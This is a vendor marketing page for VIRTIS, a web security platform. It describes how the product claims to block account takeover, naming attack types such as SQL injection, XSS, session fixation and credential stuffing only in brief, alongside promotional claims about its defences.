Skip to content

Account Takeover (ATO) Prevention

VIRTIS keeps user and customer accounts secure

Schedule a demo
Prevents-Account-Abuse

Prevents Account Abuse

The VIRTIS platform includes ATO protection as a core part of its comprehensive web security software suite. It blocks unauthorized attempts to use or discover credentials, access user accounts, compromise active sessions, and other forms of ATO.

Account-Security

Complete Account Security

VIRTIS uses multivariate analysis, identifying threat traffic not only by its source but also by its identity, behavior, and intent. The platform deploys in a dedicated VPC (Virtual Private Cloud) geolocated immediately in front of the protected network, blocking malicious traffic with near-zero latency.

1-31-768x768

Many Threats, One Security Solution

Modern threat actors use a variety of sophisticated tactics to wage ATO attacks. VIRTIS protects against them all: it prevents credential theft, credential discovery, session attacks, and the abuse of valid credentials.

Prevents Credential Theft

Many ATO attacks are intended to steal credential sets from within the targeted network:

session side jacking

System breaches

Allow hackers to exfiltrate account data

command and code

Code and command injection

Allow attackers to discover backend resources for access and exploitation

sql injection

SQL injection

Allows retrieval of private account data from user databases

Asset 5

Complex system-specific ATO techniques

Penetrate the targeted networks, e.g. SSRF attacks which target cloud IAM services

VIRTIS defends against credential theft in all its forms, by including:

“Negative security” (blacklisting)

VIRTIS maintains a comprehensive database of web-related vulnerabilities, and automatically blocks requests that match known threat signatures. The platform is a fully managed service; whenever a new threat is discovered, the database is updated with the solution that neutralizes it, and the changes are pushed immediately to all deployments of Reblaze, worldwide.

“Positive security” (whitelisting)

VIRTIS includes an automatic mechanism (which can be set in a supervised mode) that creates a granular application ruleset for each application that it protects. It strictly defines the allowed headers, HTTP methods, resources, content types, encoding, languages, forms, input fields, and so on. Once this ruleset is defined, it is virtually impossible to inject code of any kind.

Input Sanitization

VIRTIS includes a variety of protective mechanisms to sanitize and validate all content (headers and payloads) of incoming traffic. These defeat any attempts to bypass threat detection, e.g., when hackers use nested encoding in an attempt to obfuscate their hostile requests.

Other I/O Hardening

VIRTIS can run custom code at any point during processing, and can harden the traffic stream in both directions (incoming and outgoing). For example, when a cloud provider defines a new cookie attribute or request header (e.g., to mitigate SSRF attacks), VIRTIS can be programmed to add these new capabilities to the I/O stream, even if the application servers themselves cannot.

Prevents Session Attacks

If attackers can take control of an active session, they can change the user’s password, contact information, and other details to take over the account. To accomplish this, cybercriminals can use a variety of techniques to discover session tokens, and then use them to perform ATO:

man in the middle

Man-in-the-Middle (MITM)

Attackers intercept user I/O and sniff the traffic

cross site scripting

Cross-Site Scripting (XSS)

Cybercriminals plant hostile scripts within applications, which can compromise users' session tokens.

cross site forgery

Cross-Site Request Forgery

Hackers construct malicious URLs; when victims access them, hostile actions are performed within their accounts.

session side jacking

Session Side Jacking

Applications which do not use encryption for all URLs are vulnerable to attackers sniffing the post-authentication traffic.

session fixation

Session Fixation

Attackers trick victims into authenticating sessions with tokens generated by the attackers.

malware

Malware

Hackers install malware on victims' systems, and then sniff and capture network traffic, including session tokens.

Prevents-Credential-Discovery

Prevents Credential Discovery

When threat actors cannot steal valid credential sets, they attempt to discover them in other ways, including stuffing credentials and brute-forcing login forms. Modern threat actors can be quite sophisticated in their abilities to evade detection: for example, a single brute-force attack can include millions of access attempts, each of which originates from a different IP address in order to avoid rate limiting.

VIRTIS defeats these tactics by accurately tracking traffic sources, even despite geolocation rotation and other attempts to mask the requestor’s identity. The platform includes granular security ruleset configuration; policies can be defined for broad segments of an application’s traffic, or customized for individual URLs. Policy violations can result in a wide range of configurable responses, from autobanning the requestor to merely monitoring a traffic source’s behavior.

VIRTIS uses a variety of techniques to prevent session attacks from succeeding, including:

fine grain acl-1

Fine-Grained ACLs

VIRTIS provides high-precision ACL (Access Control List) capabilities. For a new deployment, its ACLs exclude 75-80 percent of hostile traffic out of the box; the rate is generally much higher after only a few days of fine-tuning and customization for the applications.

common layer 2

Comm Layer Hardening

VIRTIS can customize request and response parameters within the traffic stream to eliminate a number of common session attack vectors.

session monitoring-1

Session Monitoring

VIRTIS detects suspicious activity during active sessions (e.eg., a sudden change of geolocation), and challenges users whose activities are suspect.

user validation-1

User Validation

Biometric behavioral analysis verifies that each user's activity is consistent with past behavior.

Prevents Abuse of Valid Credentials

Attackers can obtain valid credential sets via phishing, social engineering, and other methods. They then use the credentials to access and take over the accounts. This is the most difficult form of ATO to prevent, because it does not rely on security holes, malicious inputs, brute-force tactics, or other hostile activity. The attacker simply logs into the application, as the actual user would do.

Nevertheless, VIRTIS can detect and block even this form of ATO. VIRTIS goes beyond traditional approaches to security, and adds a number of additional layers of analysis. It uses UEBA and Machine Learning to build fine-grained biometric behavioral profiles for all legitimate users and customers. The platform learns and understands users’ characteristics, and how they interact with the sites, applications, and APIs that it protects.

VIRTIS uses multivariate analysis to distinguish legitimate users from threat actors, and makes decisions not only according to the traffic source, but also according to each user’s identity, behavior, and intent. A threat actor attempting an ATO will have, unavoidably, a number of different characteristics compared to the actual user. VIRTIS detects these differences immediately.

Furthermore, every attacker must, at some point, deviate from legitimate user behavior. When a hostile actor attempts to abuse an account, VIRTIS blocks the traffic source, preventing further access.

1-34-300x300

Automatic Protection

VIRTIS analyzes global traffic patterns, identifying and adapting to new attack techniques. As a fully managed platform, VIRTIS is updated immediately as new security policies are issued. Even as hackers develop new attack techniques, VIRTIS provides robust protection, automatically.

1-32-300x300

Full Traffic Transparency

VIRTIS provides unparalleled insights into your incoming traffic. An intuitive Dashboard displays full details (headers and payloads) of all incoming requests in real time. A comprehensive View Log interface provides the ability to view historical data and rapidly construct sophisticated queries against it, showing patterns and identifying anomalous activity in the traffic stream.

A Complete Web Security Solution

Group 373

Next Generation WAF

Group 372

API Security

Group 374

DoS & DDoS Protection

Group 375

Advanced Bot Management

Group 376

Account Takeover (ATO)

Group 377

CDN Integration

Group 378

Load Balancing

Group 379

Automated Resource Scaling

Group 383

Real Time Analytics

Group 382

SIEM/SOC Integration

Group 381

Human Behavioral Analysis

Group 380

Compliance

call center gal

Schedule a Demo